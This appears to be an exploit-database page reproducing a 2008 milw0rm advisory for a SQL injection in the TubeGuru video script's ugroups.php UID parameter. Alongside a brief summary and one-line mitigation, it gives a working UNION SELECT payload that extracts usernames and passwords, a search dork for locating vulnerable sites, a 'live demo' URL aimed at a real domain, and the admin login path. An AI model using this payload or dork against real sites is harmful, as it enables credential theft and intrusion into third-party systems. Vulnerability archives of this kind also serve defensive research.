TubeGuru (ugroups php UID) Remote SQL Injection Vulnerability

vendor:

TubeGuru

by:

Hussin X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: TubeGuru

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

TubeGuru (ugroups php UID) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in TubeGuru ugroups php UID. An attacker can exploit this vulnerability to inject malicious SQL queries in the application, allowing them to gain access to sensitive information stored in the database. The vulnerable parameter is UID which can be exploited by sending a malicious payload to the application. The payload is -1 UNION SELECT 1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup-- which can be used to extract sensitive information from the database.

Mitigation:

The application should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| TubeGuru (ugroups php UID) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
|
| script : http://www.pozscripts.com/product_details.php?category_id=0&item_id=3
|
| DorK   : inurl:ugroups.php?UID=
|
|___________________________________________________|



Exploit:  

www.[target].com/Script/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup--



L!VE DEMO: :


http://www.tubeguru.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup--



admin login :

www.[target].com/Script/admin2/siteadmin/index.php

____________________________( Greetz )____________________________
|
| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
|   
| Iraqihack | FAHD | mos_chori | Silic0n 
|
|_________________________________________________________________


                       Im IRAQi

# milw0rm.com [2008-07-30]